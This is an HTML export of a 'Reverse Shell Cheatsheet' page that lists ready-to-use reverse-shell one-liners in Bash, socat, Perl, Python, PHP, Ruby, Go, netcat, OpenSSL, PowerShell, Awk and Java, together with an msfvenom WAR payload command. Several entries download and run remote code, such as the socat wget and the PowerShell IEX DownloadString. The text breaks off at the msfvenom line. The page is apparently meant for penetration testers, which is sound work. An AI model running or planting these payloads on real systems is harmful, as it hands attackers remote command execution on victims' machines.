<html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"/><title>Reverse Shell Cheatsheet</title><style>
/* webkit printing magic: print all background colors */
html {
	-webkit-print-color-adjust: exact;
}
* {
	box-sizing: border-box;
	-webkit-print-color-adjust: exact;
}

html,
body {
	margin: 0;
	padding: 0;
}
@media only screen {
	body {
		margin: 2em auto;
		max-width: 900px;
		color: rgb(55, 53, 47);
	}
}

body {
	line-height: 1.5;
	white-space: pre-wrap;
}

a,
a.visited {
	color: inherit;
	text-decoration: underline;
}

.pdf-relative-link-path {
	font-size: 80%;
	color: #444;
}

h1,
h2,
h3 {
	letter-spacing: -0.01em;
	line-height: 1.2;
	font-weight: 600;
	margin-bottom: 0;
}

.page-title {
	font-size: 2.5rem;
	font-weight: 700;
	margin-top: 0;
	margin-bottom: 0.75em;
}

h1 {
	font-size: 1.875rem;
	margin-top: 1.875rem;
}

h2 {
	font-size: 1.5rem;
	margin-top: 1.5rem;
}

h3 {
	font-size: 1.25rem;
	margin-top: 1.25rem;
}

.source {
	border: 1px solid #ddd;
	border-radius: 3px;
	padding: 1.5em;
	word-break: break-all;
}

.callout {
	border-radius: 3px;
	padding: 1rem;
}

figure {
	margin: 1.25em 0;
	page-break-inside: avoid;
}

figcaption {
	opacity: 0.5;
	font-size: 85%;
	margin-top: 0.5em;
}

mark {
	background-color: transparent;
}

.indented {
	padding-left: 1.5em;
}

hr {
	background: transparent;
	display: block;
	width: 100%;
	height: 1px;
	visibility: visible;
	border: none;
	border-bottom: 1px solid rgba(55, 53, 47, 0.09);
}

img {
	max-width: 100%;
}

@media only print {
	img {
		max-height: 100vh;
		object-fit: contain;
	}
}

@page {
	margin: 1in;
}

.collection-content {
	font-size: 0.875rem;
}

.column-list {
	display: flex;
	justify-content: space-between;
}

.column {
	padding: 0 1em;
}

.column:first-child {
	padding-left: 0;
}

.column:last-child {
	padding-right: 0;
}

.table_of_contents-item {
	display: block;
	font-size: 0.875rem;
	line-height: 1.3;
	padding: 0.125rem;
}

.table_of_contents-indent-1 {
	margin-left: 1.5rem;
}

.table_of_contents-indent-2 {
	margin-left: 3rem;
}

.table_of_contents-indent-3 {
	margin-left: 4.5rem;
}

.table_of_contents-link {
	text-decoration: none;
	opacity: 0.7;
	border-bottom: 1px solid rgba(55, 53, 47, 0.18);
}

table,
th,
td {
	border: 1px solid rgba(55, 53, 47, 0.09);
	border-collapse: collapse;
}

table {
	border-left: none;
	border-right: none;
}

th,
td {
	font-weight: normal;
	padding: 0.25em 0.5em;
	line-height: 1.5;
	min-height: 1.5em;
	text-align: left;
}

th {
	color: rgba(55, 53, 47, 0.6);
}

ol,
ul {
	margin: 0;
	margin-block-start: 0.6em;
	margin-block-end: 0.6em;
}

li > ol:first-child,
li > ul:first-child {
	margin-block-start: 0.6em;
}

ul > li {
	list-style: disc;
}

ul.to-do-list {
	text-indent: -1.7em;
}

ul.to-do-list > li {
	list-style: none;
}

.to-do-children-checked {
	text-decoration: line-through;
	opacity: 0.375;
}

ul.toggle > li {
	list-style: none;
}

ul {
	padding-inline-start: 1.7em;
}

ul > li {
	padding-left: 0.1em;
}

ol {
	padding-inline-start: 1.6em;
}

ol > li {
	padding-left: 0.2em;
}

.mono ol {
	padding-inline-start: 2em;
}

.mono ol > li {
	text-indent: -0.4em;
}

.toggle {
	padding-inline-start: 0em;
	list-style-type: none;
}

/* Indent toggle children */
.toggle > li > details {
	padding-left: 1.7em;
}

.toggle > li > details > summary {
	margin-left: -1.1em;
}

.selected-value {
	display: inline-block;
	padding: 0 0.5em;
	background: rgba(206, 205, 202, 0.5);
	border-radius: 3px;
	margin-right: 0.5em;
	margin-top: 0.3em;
	margin-bottom: 0.3em;
	white-space: nowrap;
}

.collection-title {
	display: inline-block;
	margin-right: 1em;
}

time {
	opacity: 0.5;
}

.icon {
	display: inline-block;
	max-width: 1.2em;
	max-height: 1.2em;
	text-decoration: none;
	vertical-align: text-bottom;
	margin-right: 0.5em;
}

img.icon {
	border-radius: 3px;
}

.user-icon {
	width: 1.5em;
	height: 1.5em;
	border-radius: 100%;
	margin-right: 0.5rem;
}

.user-icon-inner {
	font-size: 0.8em;
}

.text-icon {
	border: 1px solid #000;
	text-align: center;
}

.page-cover-image {
	display: block;
	object-fit: cover;
	width: 100%;
	height: 30vh;
}

.page-header-icon {
	font-size: 3rem;
	margin-bottom: 1rem;
}

.page-header-icon-with-cover {
	margin-top: -0.72em;
	margin-left: 0.07em;
}

.page-header-icon img {
	border-radius: 3px;
}

.link-to-page {
	margin: 1em 0;
	padding: 0;
	border: none;
	font-weight: 500;
}

p > .user {
	opacity: 0.5;
}

td > .user,
td > time {
	white-space: nowrap;
}

input[type="checkbox"] {
	transform: scale(1.5);
	margin-right: 0.6em;
	vertical-align: middle;
}

p {
	margin-top: 0.5em;
	margin-bottom: 0.5em;
}

.image {
	border: none;
	margin: 1.5em 0;
	padding: 0;
	border-radius: 0;
	text-align: center;
}

.code,
code {
	background: rgba(135, 131, 120, 0.15);
	border-radius: 3px;
	padding: 0.2em 0.4em;
	border-radius: 3px;
	font-size: 85%;
	tab-size: 2;
}

code {
	color: #eb5757;
}

.code {
	padding: 1.5em 1em;
}

.code > code {
	background: none;
	padding: 0;
	font-size: 100%;
	color: inherit;
}

blockquote {
	font-size: 1.25em;
	margin: 1em 0;
	padding-left: 1em;
	border-left: 3px solid rgb(55, 53, 47);
}

.bookmark-href {
	font-size: 0.75em;
	opacity: 0.5;
}

.sans { font-family: -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol"; }
.code { font-family: 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace; }
.serif { font-family: Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif; }
.mono { font-family: Nitti, 'Microsoft YaHei', '微软雅黑', monospace; }
.pdf .sans { font-family: Inter, -apple-system, BlinkMacSystemFont, "Segoe UI", Helvetica, "Apple Color Emoji", Arial, sans-serif, "Segoe UI Emoji", "Segoe UI Symbol", 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .code { font-family: Source Code Pro, 'SFMono-Regular', Consolas, 'Liberation Mono', Menlo, Courier, monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.pdf .serif { font-family: PT Serif, Lyon-Text, Georgia, KaiTi, STKaiTi, '华文楷体', KaiTi_GB2312, '楷体_GB2312', serif, 'Twemoji', 'Noto Color Emoji', 'Noto Sans CJK SC', 'Noto Sans CJK KR'; }

.pdf .mono { font-family: PT Mono, Nitti, 'Microsoft YaHei', '微软雅黑', monospace, 'Twemoji', 'Noto Color Emoji', 'Noto Sans Mono CJK SC', 'Noto Sans Mono CJK KR'; }

.highlight-default {
}
.highlight-gray {
	color: rgb(155,154,151);
}
.highlight-brown {
	color: rgb(100,71,58);
}
.highlight-orange {
	color: rgb(217,115,13);
}
.highlight-yellow {
	color: rgb(223,171,1);
}
.highlight-teal {
	color: rgb(15,123,108);
}
.highlight-blue {
	color: rgb(11,110,153);
}
.highlight-purple {
	color: rgb(105,64,165);
}
.highlight-pink {
	color: rgb(173,26,114);
}
.highlight-red {
	color: rgb(224,62,62);
}
.highlight-gray_background {
	background: rgb(235,236,237);
}
.highlight-brown_background {
	background: rgb(233,229,227);
}
.highlight-orange_background {
	background: rgb(250,235,221);
}
.highlight-yellow_background {
	background: rgb(251,243,219);
}
.highlight-teal_background {
	background: rgb(221,237,234);
}
.highlight-blue_background {
	background: rgb(221,235,241);
}
.highlight-purple_background {
	background: rgb(234,228,242);
}
.highlight-pink_background {
	background: rgb(244,223,235);
}
.highlight-red_background {
	background: rgb(251,228,228);
}
.block-color-default {
	color: inherit;
	fill: inherit;
}
.block-color-gray {
	color: rgba(55, 53, 47, 0.6);
	fill: rgba(55, 53, 47, 0.6);
}
.block-color-brown {
	color: rgb(100,71,58);
	fill: rgb(100,71,58);
}
.block-color-orange {
	color: rgb(217,115,13);
	fill: rgb(217,115,13);
}
.block-color-yellow {
	color: rgb(223,171,1);
	fill: rgb(223,171,1);
}
.block-color-teal {
	color: rgb(15,123,108);
	fill: rgb(15,123,108);
}
.block-color-blue {
	color: rgb(11,110,153);
	fill: rgb(11,110,153);
}
.block-color-purple {
	color: rgb(105,64,165);
	fill: rgb(105,64,165);
}
.block-color-pink {
	color: rgb(173,26,114);
	fill: rgb(173,26,114);
}
.block-color-red {
	color: rgb(224,62,62);
	fill: rgb(224,62,62);
}
.block-color-gray_background {
	background: rgb(235,236,237);
}
.block-color-brown_background {
	background: rgb(233,229,227);
}
.block-color-orange_background {
	background: rgb(250,235,221);
}
.block-color-yellow_background {
	background: rgb(251,243,219);
}
.block-color-teal_background {
	background: rgb(221,237,234);
}
.block-color-blue_background {
	background: rgb(221,235,241);
}
.block-color-purple_background {
	background: rgb(234,228,242);
}
.block-color-pink_background {
	background: rgb(244,223,235);
}
.block-color-red_background {
	background: rgb(251,228,228);
}

.checkbox {
	display: inline-flex;
	vertical-align: text-bottom;
	width: 16;
	height: 16;
	background-size: 16px;
	margin-left: 2px;
	margin-right: 5px;
}

.checkbox-on {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20width%3D%2216%22%20height%3D%2216%22%20fill%3D%22%2358A9D7%22%2F%3E%0A%3Cpath%20d%3D%22M6.71429%2012.2852L14%204.9995L12.7143%203.71436L6.71429%209.71378L3.28571%206.2831L2%207.57092L6.71429%2012.2852Z%22%20fill%3D%22white%22%2F%3E%0A%3C%2Fsvg%3E");
}

.checkbox-off {
	background-image: url("data:image/svg+xml;charset=UTF-8,%3Csvg%20width%3D%2216%22%20height%3D%2216%22%20viewBox%3D%220%200%2016%2016%22%20fill%3D%22none%22%20xmlns%3D%22http%3A%2F%2Fwww.w3.org%2F2000%2Fsvg%22%3E%0A%3Crect%20x%3D%220.75%22%20y%3D%220.75%22%20width%3D%2214.5%22%20height%3D%2214.5%22%20fill%3D%22white%22%20stroke%3D%22%2336352F%22%20stroke-width%3D%221.5%22%2F%3E%0A%3C%2Fsvg%3E");
}
	
</style></head><body><article id="44494604-d031-40b8-92a5-6e2437c2368d" class="page sans"><header><h1 class="page-title">Reverse Shell Cheatsheet</h1></header><div class="page-body"><h1 id="1bcf6ec4-9f99-43d4-841b-7439c2af7db3" class="">Summary</h1><nav id="ec5c961f-c871-4bfb-a0ad-36b5ee3c654a" class="block-color-gray table_of_contents"><div class="table_of_contents-item table_of_contents-indent-0"><a class="table_of_contents-link" href="#1bcf6ec4-9f99-43d4-841b-7439c2af7db3">Summary</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#e9874aba-d0a4-4c97-9c15-f06d0f5563e4">Reverse Shell</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#261f700f-2fde-4311-8a1d-408b07595e1d">Bash TCP</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#32e3ebc9-d50e-413e-80af-d100ccbd2ca7">Bash UDP</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#367cb401-95b9-4548-9980-8ef015186ba6">Socat</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#21cce7d3-5326-4b9f-9328-ae65cd5d2d58">Perl</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#32c67385-3356-48a7-96dd-f909dedfa126">Python</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#427de44a-42e8-49f4-9eda-af0275309915">PHP</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#00c2dc8f-1a00-4303-ae08-b39c47c15b71">Ruby</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#cc3d41c1-1fff-4991-8bd5-f8958717fd86">Golang</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#2b29afe5-9714-42cc-867f-355660568504">Netcat Traditional</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#c5dd1fd4-34fd-4ed0-bf5b-c61a50e18cba">Netcat OpenBsd</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#b616a7b7-22fd-42c2-9158-25b46c29f7c3">Ncat</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#c366feb6-cb2b-4748-a5f9-2a0eb40406c5">OpenSSL</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#a14e0b95-b786-4d8b-b0ad-0d53f8676ea5">Powershell</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#3cd7ad40-2c8d-4d06-917d-cb484ae1b199">Awk</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#58bad1e4-408b-4c79-942e-04371ebf8e16">Java</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#322cc33c-40ac-4f50-95e7-9675091de98b">War</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#77c86889-9e90-490c-8c3d-fcfdd83a1158">Lua</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#dca71594-f59d-474c-9f83-9e668db150d5">NodeJS</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#1fba153a-4fb8-45e4-930f-17ca204e55f3">Groovy</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#4d46d5cd-7502-433c-b891-b9364e2a3058">Meterpreter Shell</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#44b06428-e84c-4d4b-a6f6-c1377a9546d9">Windows Staged reverse TCP</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#8d0a3b41-5168-412f-b168-14eeb2427122">Windows Stageless reverse TCP</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#f64d8b5b-4780-4222-a97e-07ce2a5d7fd4">Linux Staged reverse TCP</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#7af1ee55-7bd8-48be-acd5-4a27be745ee5">Linux Stageless reverse TCP</a></div><div class="table_of_contents-item table_of_contents-indent-2"><a class="table_of_contents-link" href="#e6a600ee-bae0-4cec-8c6f-12793d1dea6a">Other platforms</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#46b6e9cd-0835-4591-92bf-265df040df6e">Spawn TTY Shell</a></div><div class="table_of_contents-item table_of_contents-indent-1"><a class="table_of_contents-link" href="#d67a5216-6654-4990-b8ba-9fac9924227a">References</a></div></nav><h2 id="e9874aba-d0a4-4c97-9c15-f06d0f5563e4" class="">Reverse Shell</h2><h3 id="261f700f-2fde-4311-8a1d-408b07595e1d" class="">Bash TCP</h3><pre id="913e2a50-79a3-4d35-a40d-78273ffbf037" class="code"><code>bash -i &gt;&amp; /dev/tcp/10.0.0.1/4242 0&gt;&amp;1

0&lt;&amp;196;exec 196&lt;&gt;/dev/tcp/10.0.0.1/4242; sh &lt;&amp;196 &gt;&amp;196 2&gt;&amp;196</code></pre><h3 id="32e3ebc9-d50e-413e-80af-d100ccbd2ca7" class="">Bash UDP</h3><pre id="3b0b4bdd-ca4e-4461-9ce7-8183ab5fe261" class="code"><code>Victim:
sh -i &gt;&amp; /dev/udp/10.0.0.1/4242 0&gt;&amp;1

Listener:
nc -u -lvp 4242</code></pre><h3 id="367cb401-95b9-4548-9980-8ef015186ba6" class="">Socat</h3><pre id="e2461b8b-db07-41fd-be21-ba60d7be5d31" class="code"><code>user@attack$ socat file:`tty`,raw,echo=0 TCP-L:4242
user@victim$ /tmp/socat exec:&#x27;bash -li&#x27;,pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242</code></pre><pre id="238eb83f-fdcd-43f7-8131-1f74737e30bc" class="code"><code>user@victim$ wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:&#x27;bash -li&#x27;,pty,stderr,setsid,sigint,sane tcp:10.0.0.1:4242</code></pre><p id="fc60ddb7-a0fa-4d4f-9f9b-04e32d2bec3f" class="">Static socat binary can be found at <a href="https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat">https://github.com/andrew-d/static-binaries</a></p><h3 id="21cce7d3-5326-4b9f-9328-ae65cd5d2d58" class="">Perl</h3><pre id="b5eb46e0-5363-472a-a52f-e1bf96279182" class="code"><code>perl -e &#x27;use Socket;$i=&quot;10.0.0.1&quot;;$p=4242;socket(S,PF_INET,SOCK_STREAM,getprotobyname(&quot;tcp&quot;));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,&quot;&gt;&amp;S&quot;);open(STDOUT,&quot;&gt;&amp;S&quot;);open(STDERR,&quot;&gt;&amp;S&quot;);exec(&quot;/bin/sh -i&quot;);};&#x27;

perl -MIO -e &#x27;$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,&quot;10.0.0.1:4242&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;&#x27;


NOTE: Windows only
perl -MIO -e &#x27;$c=new IO::Socket::INET(PeerAddr,&quot;10.0.0.1:4242&quot;);STDIN-&gt;fdopen($c,r);$~-&gt;fdopen($c,w);system$_ while&lt;&gt;;&#x27;</code></pre><h3 id="32c67385-3356-48a7-96dd-f909dedfa126" class="">Python</h3><p id="a962a1e9-e7b7-454e-a12f-5cab958cb654" class="">Linux only</p><p id="5f82dda1-1b86-4548-9220-7f7583914092" class="">IPv4</p><pre id="6861d035-8562-49b3-bde5-fd3ab34d59da" class="code"><code>export RHOST=&quot;10.0.0.1&quot;;export RPORT=4242;python -c &#x27;import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv(&quot;RHOST&quot;),int(os.getenv(&quot;RPORT&quot;))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(&quot;/bin/sh&quot;)&#x27;</code></pre><p id="231e50e3-181b-400f-bf5e-792a4ca7dc05" class="">IPv4</p><pre id="65ea0d15-df17-4f99-a46a-696ee0303e70" class="code"><code>python -c &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.0.1&quot;,4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;/bin/bash&quot;)&#x27;</code></pre><p id="c1331154-f18d-4c73-81a6-9aa98963b553" class="">IPv6</p><pre id="2b952c91-8b8c-4f90-a63d-5f2a797d8936" class="code"><code>python -c &#x27;import socket,subprocess,os,pty;s=socket.socket(socket.AF_INET6,socket.SOCK_STREAM);s.connect((&quot;dead:beef:2::125c&quot;,4242,0,2));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=pty.spawn(&quot;/bin/sh&quot;);&#x27;</code></pre><pre id="6970a80d-87d6-4ead-9374-f69c4ca308e7" class="code"><code>python -c &#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;10.0.0.1&quot;,4242));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([&quot;/bin/sh&quot;,&quot;-i&quot;]);&#x27;</code></pre><p id="225c919f-8f5f-4ea6-aa34-91c5aeeb70c9" class="">Windows only</p><pre id="a7f8455b-76fb-4c21-94f2-e3d1639073e8" class="code"><code>C:\Python27\python.exe -c &quot;(lambda __y, __g, __contextlib: [[[[[[[(s.connect((&#x27;10.0.0.1&#x27;, 4242)), [[[(s2p_thread.start(), [[(p2s_thread.start(), (lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: None)][2])(__contextlib.nested(type(&#x27;except&#x27;, (), {&#x27;__enter__&#x27;: lambda self: None, &#x27;__exit__&#x27;: lambda __self, __exctype, __value, __traceback: __exctype is not None and (issubclass(__exctype, KeyboardInterrupt) and [True for __out[0] in [((s.close(), lambda after: after())[1])]][0])})(), type(&#x27;try&#x27;, (), {&#x27;__enter__&#x27;: lambda self: None, &#x27;__exit__&#x27;: lambda __self, __exctype, __value, __traceback: [False for __out[0] in [((p.wait(), (lambda __after: __after()))[1])]][0]})())))([None]))[1] for p2s_thread.daemon in [(True)]][0] for __g[&#x27;p2s_thread&#x27;] in [(threading.Thread(target=p2s, args=[s, p]))]][0])[1] for s2p_thread.daemon in [(True)]][0] for __g[&#x27;s2p_thread&#x27;] in [(threading.Thread(target=s2p, args=[s, p]))]][0] for __g[&#x27;p&#x27;] in [(subprocess.Popen([&#x27;\\windows\\system32\\cmd.exe&#x27;], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, stdin=subprocess.PIPE))]][0])[1] for __g[&#x27;s&#x27;] in [(socket.socket(socket.AF_INET, socket.SOCK_STREAM))]][0] for __g[&#x27;p2s&#x27;], p2s.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: (__l[&#x27;s&#x27;].send(__l[&#x27;p&#x27;].stdout.read(1)), __this())[1] if True else __after())())(lambda: None) for __l[&#x27;s&#x27;], __l[&#x27;p&#x27;] in [(s, p)]][0])({}), &#x27;p2s&#x27;)]][0] for __g[&#x27;s2p&#x27;], s2p.__name__ in [(lambda s, p: (lambda __l: [(lambda __after: __y(lambda __this: lambda: [(lambda __after: (__l[&#x27;p&#x27;].stdin.write(__l[&#x27;data&#x27;]), __after())[1] if (len(__l[&#x27;data&#x27;]) &gt; 0) else __after())(lambda: __this()) for __l[&#x27;data&#x27;] in [(__l[&#x27;s&#x27;].recv(1024))]][0] if True else __after())())(lambda: None) for __l[&#x27;s&#x27;], __l[&#x27;p&#x27;] in [(s, p)]][0])({}), &#x27;s2p&#x27;)]][0] for __g[&#x27;os&#x27;] in [(__import__(&#x27;os&#x27;, __g, __g))]][0] for __g[&#x27;socket&#x27;] in [(__import__(&#x27;socket&#x27;, __g, __g))]][0] for __g[&#x27;subprocess&#x27;] in [(__import__(&#x27;subprocess&#x27;, __g, __g))]][0] for __g[&#x27;threading&#x27;] in [(__import__(&#x27;threading&#x27;, __g, __g))]][0])((lambda f: (lambda x: x(x))(lambda y: f(lambda: y(y)()))), globals(), __import__(&#x27;contextlib&#x27;))&quot;</code></pre><h3 id="427de44a-42e8-49f4-9eda-af0275309915" class="">PHP</h3><pre id="d74f71e9-86ac-42d6-8ffa-cf9971515d53" class="code"><code>php -r &#x27;$sock=fsockopen(&quot;10.0.0.1&quot;,4242);exec(&quot;/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3&quot;);&#x27;</code></pre><pre id="52e8ae57-a90b-4cad-84a7-f51e0afaaa1b" class="code"><code>php -r &#x27;$sock=fsockopen(&quot;10.0.0.1&quot;,4242);$proc=proc_open(&quot;/bin/sh -i&quot;, array(0=&gt;$sock, 1=&gt;$sock, 2=&gt;$sock),$pipes);&#x27;</code></pre><h3 id="00c2dc8f-1a00-4303-ae08-b39c47c15b71" class="">Ruby</h3><pre id="618f9d14-5f3e-4539-8a54-ddb6cb9d988a" class="code"><code>ruby -rsocket -e&#x27;f=TCPSocket.open(&quot;10.0.0.1&quot;,4242).to_i;exec sprintf(&quot;/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d&quot;,f,f,f)&#x27;

ruby -rsocket -e &#x27;exit if fork;c=TCPSocket.new(&quot;10.0.0.1&quot;,&quot;4242&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;){|io|c.print io.read}end&#x27;

NOTE: Windows only
ruby -rsocket -e &#x27;c=TCPSocket.new(&quot;10.0.0.1&quot;,&quot;4242&quot;);while(cmd=c.gets);IO.popen(cmd,&quot;r&quot;){|io|c.print io.read}end&#x27;</code></pre><h3 id="cc3d41c1-1fff-4991-8bd5-f8958717fd86" class="">Golang</h3><pre id="6cf691bb-b172-4b02-842d-2ee927ccc145" class="code"><code>echo &#x27;package main;import&quot;os/exec&quot;;import&quot;net&quot;;func main(){c,_:=net.Dial(&quot;tcp&quot;,&quot;10.0.0.1:4242&quot;);cmd:=exec.Command(&quot;/bin/sh&quot;);cmd.Stdin=c;cmd.Stdout=c;cmd.Stderr=c;cmd.Run()}&#x27; &gt; /tmp/t.go &amp;&amp; go run /tmp/t.go &amp;&amp; rm /tmp/t.go</code></pre><h3 id="2b29afe5-9714-42cc-867f-355660568504" class="">Netcat Traditional</h3><pre id="ab37ac57-9c42-4c3f-a6d2-4aeff16a7b80" class="code"><code>nc -e /bin/sh 10.0.0.1 4242
nc -e /bin/bash 10.0.0.1 4242
nc -c bash 10.0.0.1 4242</code></pre><h3 id="c5dd1fd4-34fd-4ed0-bf5b-c61a50e18cba" class="">Netcat OpenBsd</h3><pre id="99ef5468-3f61-4c8d-a30a-b658ee3255ac" class="code"><code>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2&gt;&amp;1|nc 10.0.0.1 4242 &gt;/tmp/f</code></pre><h3 id="b616a7b7-22fd-42c2-9158-25b46c29f7c3" class="">Ncat</h3><pre id="aab89671-8d63-4ce6-9ade-94d7f54faf2a" class="code"><code>ncat 10.0.0.1 4242 -e /bin/bash
ncat --udp 10.0.0.1 4242 -e /bin/bash</code></pre><h3 id="c366feb6-cb2b-4748-a5f9-2a0eb40406c5" class="">OpenSSL</h3><p id="05f4c03b-fd93-44d7-b17e-da21b31c8401" class="">Attacker:</p><pre id="4e9e0b67-bb04-4562-876f-20606c7f62a9" class="code"><code>user@attack$ openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes
user@attack$ openssl s_server -quiet -key key.pem -cert cert.pem -port 4242
or
user@attack$ ncat --ssl -vv -l -p 4242

user@victim$ mkfifo /tmp/s; /bin/sh -i &lt; /tmp/s 2&gt;&amp;1 | openssl s_client -quiet -connect 10.0.0.1:4242 &gt; /tmp/s; rm /tmp/s</code></pre><h3 id="a14e0b95-b786-4d8b-b0ad-0d53f8676ea5" class="">Powershell</h3><pre id="8309b20e-6505-4acc-9398-1b0e38954c6c" class="code"><code>powershell -NoP -NonI -W Hidden -Exec Bypass -Command New-Object System.Net.Sockets.TCPClient(&quot;10.0.0.1&quot;,4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2  = $sendback + &quot;PS &quot; + (pwd).Path + &quot;&gt; &quot;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()</code></pre><pre id="906032ac-23fc-422a-a0e4-87a0dc9a29a2" class="code"><code>powershell -nop -c &quot;$client = New-Object System.Net.Sockets.TCPClient(&#x27;10.0.0.1&#x27;,4242);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2&gt;&amp;1 | Out-String );$sendback2 = $sendback + &#x27;PS &#x27; + (pwd).Path + &#x27;&gt; &#x27;;$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()&quot;</code></pre><pre id="06425dbf-dd30-463a-bf81-2967beb1bd35" class="code"><code>powershell IEX (New-Object Net.WebClient).DownloadString(&#x27;https://gist.githubusercontent.com/staaldraad/204928a6004e89553a8d3db0ce527fd5/raw/fe5f74ecfae7ec0f2d50895ecf9ab9dafe253ad4/mini-reverse.ps1&#x27;)</code></pre><h3 id="3cd7ad40-2c8d-4d06-917d-cb484ae1b199" class="">Awk</h3><pre id="3a7f9117-db5c-483c-8c9e-6b85e0ae86a7" class="code"><code>awk &#x27;BEGIN {s = &quot;/inet/tcp/0/10.0.0.1/4242&quot;; while(42) { do{ printf &quot;shell&gt;&quot; |&amp; s; s |&amp; getline c; if(c){ while ((c |&amp; getline) &gt; 0) print $0 |&amp; s; close(c); } } while(c != &quot;exit&quot;) close(s); }}&#x27; /dev/null</code></pre><h3 id="58bad1e4-408b-4c79-942e-04371ebf8e16" class="">Java</h3><pre id="2b0ef7b9-9e63-4d0a-99d7-25137ae01503" class="code"><code>r = Runtime.getRuntime()
p = r.exec([&quot;/bin/bash&quot;,&quot;-c&quot;,&quot;exec 5&lt;&gt;/dev/tcp/10.0.0.1/4242;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done&quot;] as String[])
p.waitFor()</code></pre><h3 id="322cc33c-40ac-4f50-95e7-9675091de98b" class="">War</h3><pre id="1776296e-0caa-46f3-8526-edad2cee4a28" class="code"><code>msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.1 LPORT=4242 -f war &gt; reverse.war
